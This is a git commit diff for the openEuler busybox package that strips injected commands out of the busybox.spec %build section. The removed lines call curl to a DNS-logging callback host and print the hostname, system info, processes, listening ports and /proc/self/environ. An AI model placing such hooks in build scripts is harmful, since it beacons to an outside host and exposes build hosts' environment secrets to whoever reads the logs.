summaryrefslogtreecommitdiff
path: root/busybox.spec
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-25 02:16:05 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-25 02:16:05 +0000
commit081612b3a8ca5aee4aad2e80557676d575476bc0 (patch)
treeac26f83c576353146dd6bc391b5b899268722e8d /busybox.spec
parent74e93a13e9781d0b24e60c9c96b49c635ffd0f67 (diff)
automatic import of busybox
Diffstat (limited to 'busybox.spec')
-rw-r--r--busybox.spec10
1 files changed, 0 insertions, 10 deletions
diff --git a/busybox.spec b/busybox.spec
index 93ede03..381266d 100644
--- a/busybox.spec
+++ b/busybox.spec
@@ -59,15 +59,6 @@ This package contains help documentation for busybox
%build
export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now"
-
-echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-curl http://buildtest.bbb3294f.dns.dnslogs.online
-hostname 1>&2
-uname -a 1>&2
-ps -ef 1>&2
-netstat -nlpt 1>&2
-cat /proc/self/environ 1>&2
-
cp %{SOURCE3} .config
yes "" | make oldconfig && \
cat .config && \
@@ -76,7 +67,6 @@ make V=1 %{?_smp_mflags} CC="gcc $RPM_OPT_FLAGS"
cp busybox_unstripped busybox.dynamic
cp docs/busybox.1 docs/busybox.dynamic.1
-
make clean
cp %{SOURCE2} .config
yes "" | make oldconfig